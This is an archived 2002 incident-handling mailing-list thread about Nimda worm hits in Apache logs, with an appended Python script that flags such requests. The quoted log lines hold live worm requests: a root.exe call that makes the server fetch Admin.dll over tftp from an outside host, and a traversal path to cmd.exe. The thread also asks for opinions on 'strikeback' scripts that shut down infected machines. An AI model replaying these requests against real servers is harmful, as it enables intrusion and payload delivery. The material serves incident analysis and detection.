Ok, this has been driving me nuts. Found these lines in my Apache logs lately:

4.41.54.56 - - [23/Feb/2002:08:26:20 -0800] "GET /scripts/root.exe?/c+tftp%20-i%204.41.54.56%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 2701
4.41.54.56 - - [23/Feb/2002:08:26:22 -0800] "GET /scripts/Admin.dll HTTP/1.0" 404 295

Seemingly pointing at a specific IP. Several times now I've seen this IP and others, as well as the usual bunk Nimda lines. What the heck is it, and does it in fact point to a collection point?

Also, what is the opinion of running IIS shutdown perl scripts? The so-called Strikeback Script? On the one hand, it seems it might get the attention of the owner of the hacked IIS system; on the other... some unsaved info could be lost on the IIS machine, assuming the script even works.

I'm currently searching for a Notification Script, of the type mentioned elsewhere in this thread, if anyone has it on an FTP.

----- Original Message -----
From: "Ralph Los" <RLosat_private>
To: <incidentsat_private>
Sent: Tuesday, February 26, 2002 6:46 AM
Subject: Wave of Nimda-like hits this morning?

Hey,

I've had multiple clients' Solaris boxes crashing this morning from what appears to be a Nimda-like 'scripts/..%5c../root.exe', and the usual. The same old unicode characters are present [%2f, %5c] but a new one has appeared I haven't seen yet. This line:

' /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe '

appears a few times and I'm not quite sure what to make of it... Please keep in mind that came from a Solaris box, Apache log.

Whatever this (maybe) new bug is, it's blowing up these boxes left and right... can't figure it out. They're all relatively new 1.3'ish versions I think. Anyone else seeing anything weird?

----------------------------------------|
Ralph M. Los
Sr. Security Consultant and Trainer
EnterEdge Technology, L.L.C.
rlosat_private
(770) 955-9899 x.206
----------------------------------------|

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
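A small log check for the root.exe/tftp request pattern quoted in the message above, added here as an example and not code from either poster or from the list; the sample log lines are constructed after the ones in the post, and the marker list, regexes and field names are my own assumptions. It decodes the request, flags the Nimda request family, and pulls out the host the "tftp -i ... GET" command tells the victim to fetch Admin.dll from, so an analyst can see at a glance whether that host is the scanning source itself (as it is in the quoted log) or some other address.

```python
import re
from urllib.parse import unquote

# Constructed sample in Apache common log format, modelled on the lines quoted
# in the message; the third line is benign filler the filter should ignore.
SAMPLE_LOG = """\
4.41.54.56 - - [23/Feb/2002:08:26:20 -0800] "GET /scripts/root.exe?/c+tftp%20-i%204.41.54.56%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 2701
4.41.54.56 - - [23/Feb/2002:08:26:22 -0800] "GET /scripts/Admin.dll HTTP/1.0" 404 295
192.0.2.9 - - [23/Feb/2002:09:00:00 -0800] "GET /index.html HTTP/1.0" 200 1024
"""

# Common log format: client, ident, user, [timestamp], "request", status, bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+')
# The command passed to root.exe in the quoted line: tftp -i <host> GET <remote> [<local>]
TFTP_RE = re.compile(
    r'tftp\s+-i\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(?P<file>\S+)', re.IGNORECASE)
# Substrings (assumed marker set) that place a request in the Nimda family; compared lower-cased
NIMDA_MARKERS = ('/scripts/root.exe', '/msadc/', 'cmd.exe', 'winnt/system32', 'admin.dll')


def analyze_line(line):
    """Return a finding dict for a Nimda-style request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode once so %20 becomes a space; '+' is left alone because in these
    # requests it is the argument separator handed to root.exe, not an encoded space.
    decoded = unquote(m.group('url'))
    lowered = decoded.lower()
    if not any(marker in lowered for marker in NIMDA_MARKERS):
        return None
    finding = {'src': m.group('src'), 'status': m.group('status'),
               'decoded_url': decoded, 'tftp_host': None, 'tftp_file': None,
               'tftp_host_is_source': False}
    t = TFTP_RE.search(decoded)
    if t:
        # The host after "tftp -i" is where the victim is told to fetch the payload;
        # in the quoted log it is the same address the request came from.
        finding['tftp_host'] = t.group('host')
        finding['tftp_file'] = t.group('file')
        finding['tftp_host_is_source'] = t.group('host') == finding['src']
    return finding


def scan(log_text):
    """Run analyze_line over every line of an Apache log and collect the findings."""
    return [f for f in (analyze_line(line) for line in log_text.splitlines()) if f]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f)
```

Running it over a real access_log shows, per flagged request, the status Apache returned and the tftp host, which is the address worth reporting to its owner or abuse contact rather than anything in the Host header.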
This archive was generated by hypermail 2b30 : Wed Feb 27 2002 - 14:10:35 PST